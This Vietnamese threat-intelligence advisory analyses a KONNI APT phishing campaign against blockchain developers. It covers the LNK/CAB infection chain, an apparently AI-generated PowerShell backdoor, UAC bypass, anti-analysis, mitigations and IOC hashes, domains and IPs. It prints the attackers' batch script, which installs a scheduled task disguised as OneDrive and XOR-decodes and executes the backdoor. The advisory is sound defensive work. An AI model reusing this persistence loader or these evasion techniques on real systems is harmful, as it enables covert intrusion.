Cảnh Báo Khẩn: Nhóm KONNI tung chiến dịch tấn công mới nhắm vào nhà phát triển và hạ tầng blockchain

Tổng quan

CPR ghi nhận một chiến dịch phishing mới do KONNI – nhóm APT hoạt động từ ít nhất 2014 – đang thực hiện. Nhóm này vốn nổi tiếng với các hoạt động gián điệp nhắm vào Hàn Quốc, tập trung vào cộng đồng ngoại giao, quan hệ quốc tế, tổ chức phi chính phủ, học thuật và các cơ quan nhà nước.

Trong chiến dịch này, KONNI sử dụng các tài liệu giả dạng tài liệu dự án blockchain để tấn công các nhà phát triển phần mềm và đội kỹ thuật, khả năng nhằm chiếm quyền truy cập vào hạ tầng blockchain, API, ví tiền mã hóa, hoặc môi trường phát triển.

Điểm đáng chú ý là chiến dịch mở rộng rõ rệt ra ngoài Hàn Quốc, và sử dụng mã độc PowerShell được AI hỗ trợ sinh ra, cho thấy sự nâng cấp đáng kể trong năng lực của tác nhân đe dọa.

---

Mục tiêu và nội dung mồi nhử

Trước đây, KONNI chủ yếu nhắm vào Hàn Quốc. Tuy nhiên, các mẫu gần đây trên VirusTotal cho thấy nạn nhân nằm ở Nhật Bản, Úc và Ấn Độ.

Tài liệu mồi nhử mô phỏng tài liệu kỹ thuật dự án blockchain, gồm:

• Kiến trúc hệ thống

• Công nghệ sử dụng

• Roadmap phát triển

• Ngân sách và mốc bàn giao

Mục tiêu có vẻ nhằm xâm nhập môi trường phát triển, từ đó:

• Đánh cắp thông tin hạ tầng

• Thu thập API keys

• Truy cập ví tiền mã hóa

• Can thiệp vào chuỗi cung ứng phần mềm

Lịch sử ghi nhận KONNI từng có hoạt động liên quan mục tiêu tài chính và tiền mã hóa.

---

Chuỗi lây nhiễm

Chuỗi tấn công khởi đầu từ một đường dẫn Discord dẫn đến file ZIP chứa:

• 1 PDF tài liệu mồi nhử

• 1 file LNK độc hại

File LNK chứa PowerShell loader và hai payload được nhúng XOR-encoded:

• 1 DOCX mồi nhử (dùng để đánh lạc hướng người dùng)

• 1 file CAB chứa các thành phần độc hại

Các bước chính:

1. LNK giải mã và ghi DOCX + CAB ra ổ đĩa.

2. DOCX được mở để che giấu hành vi độc hại.

3. CAB được giải nén, chứa:

   • PowerShell backdoor

   • 2 batch scripts

   • 1 file thực thi UAC bypass

Batch đầu tiên:

@echo off

    mkdir "C:\ProgramData\VljE"
    move "C:\ProgramData\zVJs.ps1" C:\ProgramData\VljE\
    move "C:\ProgramData\mKIftBn.bat" C:\ProgramData\VljE\
    schtasks /create /sc hourly /mo 1 /tn "OneDrive Startup Task-S-1-5-21-3315426051-1901789636-3309192473-4545" /tr "cmd /c powershell -w h $d=[IO.File]::ReadAllBytes(\\\"C:\ProgramData\VljE\zVJs.ps1\\\");$b=[Text.Encoding]::UTF8.GetBytes(\\\"Q\\\");for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$b[$i%%$b.Length]};$c=[Text.Encoding]::UTF8.GetString($d);iex $c" /rl limited /ru "%username%" /f
    timeout -t 3 /nobreak
    "C:\ProgramData\OneDriveUpdater.exe"
    del "%~f0"&exit /b

• Tạo thư mục staging ở C:\ProgramData\VljE

• Di chuyển backdoor + script vào đó

• Tạo scheduled task giả dạng OneDrive, chạy mỗi giờ

• Giải mã backdoor (XOR với ‘Q’) rồi chạy bằng IEX

• Tự xóa nhằm giảm dấu vết

Backdoor PowerShell được mã hóa nặng bằng phép toán số học nhằm che giấu chuỗi và logic thật.

---

Backdoor PowerShell do AI tạo ra

Mẫu phân tích cho thấy rõ dấu hiệu được viết bằng AI, bao gồm:

• Có phần documentation rõ ràng, mạch lạc (hiếm gặp trong mã độc)

• Chia module theo từng chức năng riêng biệt

• Chứa comment dạng instructional như:

  “# <– your permanent project UUID”

Đây là kiểu thường thấy trong code mẫu do LLM sinh ra.
Điều này cho thấy KONNI đang tích cực kết hợp AI trong phát triển mã độc.

---

Phân tích Backdoor PowerShell

Backdoor thực hiện:

1. Anti-analysis

• Kiểm tra môi trường ảo hóa, phần cứng

• Blacklist các công cụ phân tích: IDA, Wireshark, Procmon…

• Theo dõi hoạt động chuột, yêu cầu có tương tác người dùng

2. Kiểm soát chạy một lần

Tạo mutex toàn hệ thống:
Global\SysInfoProject_<UUID>

UUID sử dụng chung trong toàn chiến dịch.

3. Tạo định danh nạn nhân

• Lấy serial motherboard + UUID hệ thống

• Băm SHA-256 → cắt 16 ký tự đầu

• Gắn chuỗi chiến dịch để phân loại nạn nhân

4. Hành vi theo quyền người dùng

• User: thực hiện UAC bypass qua fodhelper.exe, chạy rKXujm.exe để tắt UAC

• Admin: xóa file bypass, thêm Windows Defender exclusion, nâng quyền scheduled task

• System: cài đặt công cụ RMM SimpleHelp, cho phép truy cập từ xa lâu dài

5. Giao tiếp C2

• Thực hiện cơ chế mô phỏng JavaScript challenge để nhận cookie __test

• Gửi metadata hệ thống đến C2 định kỳ

• Nhận PowerShell code và thực thi thông qua background jobs

• Tiếp tục kiểm tra công cụ phân tích trong quá trình chạy

---

Biến thể trước đó

Mẫu cũ từ tháng 10/2025 chứa:

• PowerShell loader nặng obfuscation

• Batch files, VBS launcher

• 2 file PE: uc.exe (UAC bypass) và OneDriveUpdater.exe

• OneDriveUpdater dùng để download và chạy SimpleHelp client

Chuỗi thực thi trong biến thể cũ:

1. start.vbs →

2. simi.bat (staging + chạy OneDriveUpdater) →

3. schedule1.bat (tạo persistence)

Cấu trúc này trùng với nhiều chiến dịch KONNI trong quá khứ.

---

Gán Attribution

Bằng chứng cho thấy đây là chiến dịch của KONNI:

• LNK được đóng gói và cấu trúc giống mẫu KONNI trước đây

• Chuỗi thực thi VBS → BAT → PowerShell đúng mô hình đặc trưng của KONNI

• Reuse nhiều tên file và logic từng xuất hiện trong các chiến dịch cũ

• Lure filename trùng với artifact KONNI trước đó (ví dụ Avinash_CV.lnk)

Các điểm này khẳng định chiến dịch thuộc bộ công cụ của KONNI.

---

Kết luận

Chiến dịch mới của KONNI cho thấy sự:

• Giữ nguyên phương thức lây nhiễm truyền thống (LNK, VBS/BAT chain)

• Thay đổi mạnh về mục tiêu (nhắm vào blockchain, developer environments)

• Nâng cấp đáng kể trong công cụ (sử dụng backdoor PowerShell do AI tạo)

• Mở rộng địa lý sang nhiều quốc gia ngoài Hàn Quốc

KONNI tiếp tục tận dụng chuỗi lây nhiễm ổn định, nhưng đang nhanh chóng thích ứng với mục tiêu có giá trị cao và công nghệ mới.

---

Khuyến nghị

Phía FPT Threat Intelligence đưa ra các khuyến nghị sau:

1. Chặn kênh phân phối

• Chặn truy cập tới Discord CDN đối với file thực thi, shortcut, ZIP (tùy môi trường).

• Block các tên miền/địa chỉ IP IOC trong danh sách kèm theo.

2. Tăng cường bảo vệ email & file download

• Bật sandbox phân tích file cho email và web download.

• Kiểm soát tập tin LNK, ZIP, CAB, không cho người dùng tải hoặc mở nếu không cần thiết.

3. Bảo vệ PowerShell và Script

• Bật PowerShell Constrained Language Mode cho người dùng không cần đặc quyền.

• Giám sát việc gọi powershell.exe từ LNK / batch / VBS.

• Chặn thực thi scripts trong C:\ProgramData bằng AppLocker hoặc WDAC.

4. Giảm nguy cơ leo thang đặc quyền

• Tắt các kỹ thuật bypass phổ biến như:

  • fodhelper.exe auto-elevated

  • Giới hạn chỉnh sửa registry dưới HKCU\Software\Classes.

• Bật UAC ở chế độ Always Notify.

5. Bảo vệ môi trường Dev & Blockchain

• Tách biệt môi trường developer với mạng sản xuất.

• Bảo vệ API keys, credentials, wallet bằng Vault/HSM.

---

Indicators of Compromise (IOCs)

Hashes:

ZIP

• c79ef37866b2dff0afb9ca07b4a7c381ba0b201341f969269971398b69ade5d5

• c040756802a217abf077b2f14effb1ed68e36165fde660fef8ff0cfa2856f25d

• f619d63aa8d09bafb13c812bf60f2b9189a8dc696c7cef2f246c6b223222e94c

• b411fbe03d429556ced09412dd26dc972ee55cff907bfdb5594fe9e3f1c9f0b2

• fcc9b2ac73a0ca01fb999e6aa1a8bdbd89e632939443bcc9186ae1294089123e

LNK

• 39fdff2ea1a5e2b6151eccc89ca6d2df33b64e09145768442cec93a578f1760c

• 26356e12aae0a2ab1fd0ec15d49208603d3dd1041d50a0b153ab577319797715

• a1d4272ec0ce88f9c697b3e6c70624ec5f1ad9a83c9e64120b5ee21688365af9

• 856ac810f4a00a7e3fa89aec4c94cc166ae6ccf06c3557e9694f8639223ce25d

• e57fa2d1d3e2bff9603ce052e51a8d6ee5c6d207633765b401399b136249ca35

• c94e58f134c26c3dc25f69e4da81d75cbf4b4235bcfb40b17754da5fe07aad0a

• 3b67217507e0c44bd7a4cfafed0e8958d21594c98eec43a999614815a7060410

CAB

• de75afa15029283154cf379bc9bb7459cbcd548ff9d11efe24eb2fde7552af07

• 8647209127d998774179aa889d2fcc664153d73557e2cca5f29c261c48dd8772

Scripts

• b958d4d6ce65d1c081800fc14e558c34daff3b28cdd45323d05b8d40c4146c3c

• b15f95d0f269bc1edce0e07635681d7dd478c0daa82c6bfd50c551435eba10ff

• c2ec24dea46273085daa82e83c1c38f3921c718a61f617a66e8b715d1dcc0f57

• fb9f16a8900bae93dd93b5d059a0d2997c1db7198acf731f3acf1696a19eeead

• c3c8d6ea686ad87ca2c6fcb5d76da582078779ed77c7544b4095ecd7616ba39d

• af8ca986a52e312fb85f97b235e4b406d665d7ac09cbdb5e25662d4c508ebad4

• ec8c191ad171cf40461dc870b02f5c4e9904f9fec1191174d524b1fb3cbde47f

• 738637fcb82920f418111c0cd83d74d9a0807972a73abfbdc71b7446e5bd6a9d

• 159f81fc57399186503190562f28b2dd430d8cc07303e15e2ec60aee6bca798c

• eec55e9a7f27f2ecaba71735fbd636679783ff60d9019eabf8216beebd47300b

• 20e61936144822399149e651da665eb67b16e90ec824dac3d9eec8a4da42fdd2

• 851695cb3807a693aae25c8b9ade20a90eaea6802bc619c1d19d121a92aef7a0

• 1ebc4542905c8d4fd8ac6f6d9fadeef51698e5916f6ce1bcc61dcfdea02758ec

• 48585baa9f1c2b721bb8c4fbd88eff65f8fa580a662aadcd143bc4fda6590156

Executable

• f8e86693916be2178b948418228d116a8f73c7856e11c1f4470b8c413268c6c8

• 64e6a852fc2e4d3e357222692eefbf445c2bd9ba654b83e64fe9913f2bb115cc

• 26a01ffa237241e31a59f1ff4d62a063f55c97598732d55855cce18b8b27b2d6

Domains & IPs:

• filetrasfer.wuaze[.]com

• goldenftp.rf[.]gd

• plaza.xo[.]je

• gabber.42web[.]io

• humimianserver.kesug[.]com

• drone.ct[.]ws

• 46.4.112[.]56

• 192.144.34[.]77

• 192.144.34[.]40

• 34.203.111[.]164

• 223.16.184[.]105

---

Tham khảo

• KONNI Adopts AI to Generate PowerShell Backdoors - Check Point Research

• Konni Hackers Deploy AI-Generated PowerShell Backdoor Against Blockchain Developers

• Konni hackers target blockchain engineers with AI malware